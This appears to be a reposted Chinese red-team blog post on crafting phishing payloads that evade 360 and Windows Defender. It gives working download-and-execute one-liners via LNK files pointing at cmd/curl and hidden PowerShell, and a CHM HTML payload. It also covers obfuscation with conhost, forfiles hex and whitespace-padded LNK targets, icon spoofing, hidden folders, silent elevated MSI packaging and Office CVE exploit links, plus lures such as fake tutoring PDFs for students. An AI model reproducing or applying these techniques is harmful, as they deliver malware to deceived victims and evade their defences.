360核晶等杀软环境下钓鱼思路分享

admin 2025年1月20日13:14:01评论46 views字数 5799阅读19分19秒阅读模式
下面进入正文!
本次分享的钓鱼思路包括多种情况,有单lnk、单lnk免下载、lnk+vbs绕过360核晶、office、msi等钓鱼攻击思路,一些lnk对象属性、图标设置等混淆方法,同时过360核晶的钓鱼样本也分享在圈子里。
360核晶等杀软环境下钓鱼思路分享
若对钓鱼有更好的见解可以私信公众号后台,希望与各位师傅一起交流~。这次分享会缺乏些话术类,针对与话术类的文章很冗长,比较难整理,师傅们见谅~

 WINRAR自解压 

选择添加到压缩文件

360核晶等杀软环境下钓鱼思路分享

选上你的exe(或者VBS脚本)

360核晶等杀软环境下钓鱼思路分享

选上你要运行的VBS或者EXE

360核晶等杀软环境下钓鱼思路分享

全部隐藏

360核晶等杀软环境下钓鱼思路分享

以及这两个选项

360核晶等杀软环境下钓鱼思路分享

记得选上解压路径

360核晶等杀软环境下钓鱼思路分享

 lnk钓鱼实战思路 

在这个方法之前先来了解一下网上其他方法,在目前已经欠佳了的,这里提供的lnk指向大同小异,可能有的会有弹框没处理。并且现在单lnk钓鱼的方式非常少查杀力度很高

指向cmd

lnk直接指向C:WindowsSystem32cmd.exe后面跟参数执行命令的,这种方法在360环境下已经失效了,但大多数Windows defender环境绕过是能绕过,不过特征太明显了。

C:WindowsSystem32cmd.exe /c "curl http://xxx:10000/mylnk.exe -o C:UsersfuckmianshaDesktopmylnk.exe" && C:UsersfuckmianshaDesktopmylnk.exe

指向conhost

执行cmd命令时候还可以这样做混淆:

C:windowssystem32conhost.exe conhost conhost conhost conhost conhost conhost cmd /c notepad

指向powershell

lnk指向Powershell的方式远程下载文件并且运行,和指向cmd差不多。同时,运行ps1脚本也是可以(已经报毒了,defender也报毒)

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://xxx:10000/mylnk.exe' -OutFile 'C:Users20h2Desktopmylnk.exe'; Start-Process 'C:Users20h2Desktopmylnk.exe'"

指向explorer

lnk指向explorer可以执行大多数的内容,后面加上cmd.exe、powershell、vbs、hta、可执行文件等,这种方式在df环境下可还行,在360环境下会直接报毒。

指向forfile.exe

forfiles.exe /p c:windowssystem32 /m user32.dll /c"0x630x6d0x640x200x2f0x63 notepad | calc

这里的0x630x6d0x640x200x2f0x63是十六进制的cmd /c

指向cscript、wscript过360核晶

指向cscript、wscript可以运行vbs脚本,这种是绕过360核晶比较好的方式,缺点就是不能单单lnk文件进行钓鱼,所以钓鱼过程中都是要发压缩包的。它的利用场景有很多,最容易的就是在校园墙表白墙上发布当地的家教信息,而家教信息是我们经过加密的PDF文件,在外部有一个PDF-password.txt.lnk,这一个lnk内容是cscript.exe指向一个隐藏文件夹的vbs。

文件架中是当地的高薪家教信息。另外也可以放,某某资源,某doll等内容😎(前提是报备允许):

指向vbs之后能够进行的动作就有很多了,需要避免的就是不要设计到cmd、powershell、curl等。这里给出当前场景下白加黑的操作:

首先我们得木马是改过为pdf后缀,配合里面的pdf文件,dll也是,而shellcode.bin的话随便什么都可以了因为那是二进制打开的。指向的VBS会修改白程序后缀(这里可以做一手修改图标的操作更像一点),修改黑dll名字和后缀,并且运行,之后删除password.txt.lnk文件,释放真实的password.txt,并且打开这个密码,最后删除VBS文件!

效果演示:

完整钓鱼样本经过处理(改为弹计算器了)以及完整思路也放在了内部圈子了~

360核晶等杀软环境下钓鱼思路分享

对象位置混淆

$file = Get-Content ".test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(".PDF.lnk")
$Shortcut.TargetPath = "C:windowssystem32cscript.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,70"
$Shortcut.Arguments = '                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            '+ $file
$Shortcut.Save()

这个powershell脚本会读取test.txt的内容,比如内容是123.vbs,之后TargetPath会和它进行拼接,由于lnk的对象位置最大容量为260左右,所以多出来的不会显示在属性之中:

360核晶等杀软环境下钓鱼思路分享

修改快捷方式图标

首先随便创建一个普通的快捷方式(这里指向计算器) 然后先换这个!(否则后面会出错%SystemRoot%System32SHELL32.dll

360核晶等杀软环境下钓鱼思路分享

然后我们这里用010editoer  首先安装一个这个库:

360核晶等杀软环境下钓鱼思路分享

然后去010editer把这个打开:

360核晶等杀软环境下钓鱼思路分享然后去下面修改这个

360核晶等杀软环境下钓鱼思路分享如果你想要pdf的话就是 .1.pdf

360核晶等杀软环境下钓鱼思路分享

如果想要docx 就改成 .1.docx

360核晶等杀软环境下钓鱼思路分享

此外以下内容也可以成为图标路径

access = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}accicons.exe"
excel = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}xlicons.exe"
lync = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}lyncicon.exe"
office = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}ohub32.exe",56
onedrive = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}grv_icons.exe"
onenote = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}joticon.exe"
outlook = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}outicon.exe"
powerpoint = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pptico.exe"
project = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pj11icon.exe"
publisher = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pubs.exe"
visio = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}visicon.exe"
word = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}wordicon.exe"

设置系统级隐藏文件夹

用管理员打开cmd:

attrib +s +a +h +r e:baktools
  • +s:系统文件属性
  • +a:存档属性
  • +h:隐藏属性
  • +r:只读属性

在bandzip能看见,在windows默认点击zip能看见,7zip也能看见,但是默认的windows解压看不见(就算是开了显示隐藏文件夹)

单lnk无下载操作

用到lnk的时候可能会使用到多个文件或是下载文件,现在分享一种单lnk文件无下载的方式,直接将exe或dll放入lnk里面,并且点开还会显示正常的内容。这种方式在360和火绒下均会报毒,但经过测试在df下不会报毒,也能分享给大家学习~

项目地址:https://github.com/d1mov/evillnk

360核晶等杀软环境下钓鱼思路分享
360核晶等杀软环境下钓鱼思路分享

 CHM钓鱼 

调用calc不会出事,但是调用powershell会出事。这种方式可以配合vbs脚本执行!

<html>
<head>
<title>Download and Execute xxx.exe</title>
</head>
<body>
<h1>Download and Execute mintty.exe</h1>
<p>Click below to download and execute mintty.exe from the specified URL:</p>

<OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c $client = new-object net.webclient; $url = 'http://xxxx:8080/xxx.exe'; $outputPath = 'C:Users$env:USERNAMEDesktopxxx.exe'; $client.downloadfile($url, $outputPath); if (Test-Path $outputPath) { Start-Process $outputPath } else { Write-Host 'Download failed' }">
  <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
  x.Click();
</SCRIPT>

</body>
</html>

 msi钓鱼 

MSI是winodws的安装程序,先来讲讲怎么制作,对于msi的打包工具有很多,这些工具都很难操作,这里推荐一个较为简单的打包工具——MSI Wrapper:

360核晶等杀软环境下钓鱼思路分享记得把这个选上

360核晶等杀软环境下钓鱼思路分享

全部选Hidden

360核晶等杀软环境下钓鱼思路分享

这里选择Always Elevate

360核晶等杀软环境下钓鱼思路分享

这个随便选一个填就好了

360核晶等杀软环境下钓鱼思路分享

这里直接选Registry 或者说自定义(Manual)

360核晶等杀软环境下钓鱼思路分享

如果想像一点的话可以加

360核晶等杀软环境下钓鱼思路分享

这个记得加上 /S 的参数

360核晶等杀软环境下钓鱼思路分享

最后直接build

360核晶等杀软环境下钓鱼思路分享

 利用Office进行攻击 

对于Office来说网上常见到的是使用宏和加载项,but这都难免会有安全警告,接下来分享一种加载项进行钓鱼的,同时也可以用来进行维权操作。原理大致是,excel可以打开一个恶意的xll文件(和DLL文件基本差不多),这个xll文件利用的则是office的加载项,同理word、ppt也可以使用类似的用法~

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md

360核晶等杀软环境下钓鱼思路分享

CVE

Office历史上出现的可导致远程命令执行的漏洞有很多、如:CVE-2017-0199、CVE-2017-8570、CVE-2017-8759、CVE-2017-11882、CVE-2018-0802 等:

CVE-2017-0199

https://github.com/bhdresh/CVE-2017-0199

影响版本:office 2016、2013、2010、2007

CVE-2017-11882

https://github.com/Ridter/CVE-2017-11882/

影响版本:office 2016、2013、2010、2007、2003

CVE-2018-0802

https://github.com/rxwx/CVE-2018-0802

影响版本:office 2016、2013 Server Pack1、2010 Server Pack2、2007 Server Pack3

原文始发于微信公众号(半只红队):【永不空军!】| 360核晶等杀软环境下钓鱼思路分享

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月20日13:14:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   360核晶等杀软环境下钓鱼思路分享https://cn-sec.com/archives/3648781.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息